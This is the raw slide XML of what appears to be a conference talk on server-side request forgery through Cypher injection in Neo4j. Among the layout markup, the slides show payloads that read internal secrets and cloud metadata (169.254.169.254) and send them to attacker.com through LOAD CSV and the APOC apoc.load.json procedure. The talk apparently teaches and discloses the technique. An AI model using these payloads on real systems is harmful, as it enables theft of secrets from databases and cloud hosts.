        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326800" y="344875"/>
            <a:ext cx="8873700" cy="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SSRF Through Cypher Injection</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3561" name="Google Shape;3561;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267500" y="666938"/>
            <a:ext cx="499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erver-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equest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orgery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2" name="Google Shape;356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3424" y="2183225"/>
            <a:ext cx="1407015" cy="950682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3563" name="Google Shape;3563;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4573125" y="2015475"/>
            <a:ext cx="1224600" cy="122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4" name="Google Shape;3564;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6936800" y="16280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5" name="Google Shape;3565;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2023638" y="2321589"/>
            <a:ext cx="287674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566" name="Google Shape;3566;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4114963" y="2321589"/>
            <a:ext cx="287674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567" name="Google Shape;3567;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6179675" y="2315489"/>
            <a:ext cx="287674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568" name="Google Shape;3568;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2000111" y="2778801"/>
            <a:ext cx="287326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569" name="Google Shape;3569;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4091449" y="2780776"/>
            <a:ext cx="287326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570" name="Google Shape;3570;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6135261" y="2780776"/>
            <a:ext cx="287326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3571" name="Google Shape;357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7800" y="2227150"/>
            <a:ext cx="1208601" cy="8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2" name="Google Shape;357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238" y="1291077"/>
            <a:ext cx="1629000" cy="111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73" name="Google Shape;3573;p65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619450" y="3284100"/>
            <a:ext cx="4488600" cy="690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4" name="Google Shape;3574;p65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619325" y="3418449"/>
            <a:ext cx="359100" cy="3591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5" name="Google Shape;3575;p65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3589448" y="3418449"/>
            <a:ext cx="359100" cy="3591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76" name="Google Shape;3576;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix amt="83000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7552100" y="3564475"/>
            <a:ext cx="590771" cy="24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65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="72000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7109881" y="3436650"/>
            <a:ext cx="429746" cy="4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8" name="Google Shape;3578;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6936800" y="21614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9" name="Google Shape;3579;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6936800" y="26948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0" name="Google Shape;3580;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927400" y="26948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1" name="Google Shape;3581;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927400" y="21614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2" name="Google Shape;3582;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927400" y="16280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3" name="Google Shape;3583;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="72000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010252" y="3436650"/>
            <a:ext cx="429746" cy="4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Google Shape;3584;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix amt="65000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231550" y="3396213"/>
            <a:ext cx="510651" cy="510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3585" name="Google Shape;358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6" name="Google Shape;3586;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371050" y="2806752"/>
            <a:ext cx="271094" cy="3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65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585950" y="1872601"/>
            <a:ext cx="185717" cy="2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65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585950" y="2406001"/>
            <a:ext cx="185717" cy="2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p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585950" y="2939401"/>
            <a:ext cx="185717" cy="2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0" name="Google Shape;3590;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8576550" y="2406001"/>
            <a:ext cx="185717" cy="2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1" name="Google Shape;3591;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8576550" y="2939401"/>
            <a:ext cx="185717" cy="2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2" name="Google Shape;3592;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8576550" y="1872601"/>
            <a:ext cx="185717" cy="2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p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246950" y="1164225"/>
            <a:ext cx="8481600" cy="286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SSRF +  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOAD CSV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9" name="Google Shape;3599;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="21525" r="20810" t="16142"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3235950" y="3095575"/>
            <a:ext cx="2503594" cy="204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" name="Google Shape;3604;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75450" y="1297125"/>
            <a:ext cx="4592700" cy="289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5" name="Google Shape;360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25" y="2519702"/>
            <a:ext cx="1629000" cy="111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6" name="Google Shape;3606;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326800" y="344875"/>
            <a:ext cx="8873700" cy="24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Leveraging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOAD CSV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t> SSRF</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3607" name="Google Shape;3607;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix amt="36000"/>
          </a:blip>
          <a:srcRect b="25098" l="45929" r="1380" t="2259"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6874425" y="1587753"/>
            <a:ext cx="2176500" cy="254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8" name="Google Shape;3608;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051125" y="17520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9" name="Google Shape;3609;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="83000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7666425" y="3688400"/>
            <a:ext cx="590771" cy="24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0" name="Google Shape;3610;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="72000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7224206" y="3560575"/>
            <a:ext cx="429746" cy="4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1" name="Google Shape;3611;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218450" y="2196400"/>
            <a:ext cx="1755600" cy="146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2" name="Google Shape;3612;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051125" y="22854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3" name="Google Shape;3613;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051125" y="28188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4" name="Google Shape;3614;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041725" y="28188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5" name="Google Shape;3615;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041725" y="22854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6" name="Google Shape;3616;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041725" y="17520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7" name="Google Shape;3617;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="72000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7124577" y="3560575"/>
            <a:ext cx="429746" cy="4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67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix amt="65000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8345875" y="3520138"/>
            <a:ext cx="510651" cy="510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3619" name="Google Shape;3619;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2325525" y="666938"/>
            <a:ext cx="499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erver-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equest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orgery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0" name="Google Shape;3620;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4703138" y="1846850"/>
            <a:ext cx="213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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2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/secret</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2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621" name="Google Shape;3621;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957450" y="2416650"/>
            <a:ext cx="1967400" cy="132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Vulnerable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2" name="Google Shape;3622;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157200" y="1517500"/>
            <a:ext cx="328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LOAD CSV FROM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000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23" name="Google Shape;3623;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5619150" y="2452239"/>
            <a:ext cx="287674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624" name="Google Shape;3624;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5619336" y="2836951"/>
            <a:ext cx="287326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625" name="Google Shape;3625;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4606425" y="1905613"/>
            <a:ext cx="333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/latest/metadata</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="20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626" name="Google Shape;3626;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7098775" y="1974975"/>
            <a:ext cx="81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IMDSv1</a:t>
            </a:r>
            <a:endParaRPr b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627" name="Google Shape;3627;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193875" y="1840175"/>
            <a:ext cx="354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http://internal_host/secret</a:t>
            </a:r>
            <a:endParaRPr b="1" i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28" name="Google Shape;3628;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051125" y="17520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9" name="Google Shape;3629;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644075" y="1850313"/>
            <a:ext cx="317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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="21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169.254.169.254</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="21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630" name="Google Shape;3630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1987" y="1782201"/>
            <a:ext cx="265974" cy="3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31" name="Google Shape;3631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2" name="Google Shape;3632;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3330651" y="3082799"/>
            <a:ext cx="455125" cy="6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67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704675" y="3082800"/>
            <a:ext cx="174487" cy="2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4" name="Google Shape;3634;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8695275" y="3082800"/>
            <a:ext cx="174487" cy="2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5" name="Google Shape;3635;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8695275" y="2549400"/>
            <a:ext cx="174487" cy="2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6" name="Google Shape;3636;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8695275" y="2016000"/>
            <a:ext cx="174487" cy="2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7" name="Google Shape;3637;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704675" y="2549400"/>
            <a:ext cx="174487" cy="2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8" name="Google Shape;3638;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9050" t="5368"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704675" y="2016000"/>
            <a:ext cx="174487" cy="2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3" name="Google Shape;3643;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354575" y="1969975"/>
            <a:ext cx="69543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4" name="Google Shape;3644;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691400" y="2417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Leak Secrets Through SSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3645" name="Google Shape;3645;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238800" y="2016425"/>
            <a:ext cx="881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LOAD CSV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"http://localhost:3030/internal-api/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="21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keys.txt"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secret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LOAD CSV FROM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"http://attacker.com/"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="21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+secret[0]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line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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1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secret</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="21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[0]</a:t>
            </a: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//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6" name="Google Shape;3646;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="18546" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="741331"/>
            <a:ext cx="9144001" cy="117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68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="8659" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="840463"/>
            <a:ext cx="9144001" cy="3587908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8" name="Google Shape;3648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69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766225" y="1044750"/>
            <a:ext cx="750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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-139725" y="1162525"/>
            <a:ext cx="8706000" cy="14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Vendor Communication</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3655" name="Google Shape;3655;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102850" y="887450"/>
            <a:ext cx="493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My 2 cents about our</a:t>
            </a:r>
            <a:endParaRPr sz="3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656" name="Google Shape;3656;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="999450" y="2393825"/>
            <a:ext cx="2514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LOAD CSV</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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657" name="Google Shape;3657;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972375" y="2428775"/>
            <a:ext cx="2943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APOC Plugin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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3658" name="Google Shape;36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52624" cy="9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9" name="Google Shape;365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3400" y="3352825"/>
            <a:ext cx="2438376" cy="17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0" name="Google Shape;3660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8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9" name="Google Shape;3179;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14133" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="930125" y="479525"/>
            <a:ext cx="7097050" cy="46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0" name="Google Shape;3180;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6933675" y="4200375"/>
            <a:ext cx="1362300" cy="94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34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6824100" y="4903875"/>
            <a:ext cx="346500" cy="239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2" name="Google Shape;318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8525" y="734598"/>
            <a:ext cx="5994600" cy="31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3" name="Google Shape;318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70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434000" y="1536675"/>
            <a:ext cx="6006000" cy="143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6" name="Google Shape;3666;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414925" y="362975"/>
            <a:ext cx="81846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CSV was blocked?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Go APOC Library!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3667" name="Google Shape;3667;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434000" y="1596900"/>
            <a:ext cx="6168300" cy="14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 sz="3000"/>
              <a:t>Extension to Cypher Language</a:t>
            </a:r>
            <a:endParaRPr b="1"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1" lang="en" sz="3000"/>
              <a:t>Load, Import, Export procedure</a:t>
            </a:r>
            <a:endParaRPr b="1"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3668" name="Google Shape;3668;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183100" y="4712600"/>
            <a:ext cx="35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https://neo4j.com/developer/neo4j-apoc</a:t>
            </a:r>
            <a:endParaRPr i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669" name="Google Shape;3669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71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298475" y="1178175"/>
            <a:ext cx="5992500" cy="153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5" name="Google Shape;3675;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414925" y="362975"/>
            <a:ext cx="8184600" cy="57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CSV was blocked?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Go APOC Library! #2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3676" name="Google Shape;3676;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226275" y="1215900"/>
            <a:ext cx="8879100" cy="24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MATCH</a:t>
            </a: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CALL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="25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apoc.load.json</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="25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("https://attacker.com/data.json?leaked="+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="25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c.name</a:t>
            </a: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YIELD</a:t>
            </a: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 value</a:t>
            </a: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RETURN</a:t>
            </a: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 value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7" name="Google Shape;3677;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164025" y="4746550"/>
            <a:ext cx="35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https://neo4j.com/developer/neo4j-apoc</a:t>
            </a:r>
            <a:endParaRPr i="1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3678" name="Google Shape;3678;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="29398" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
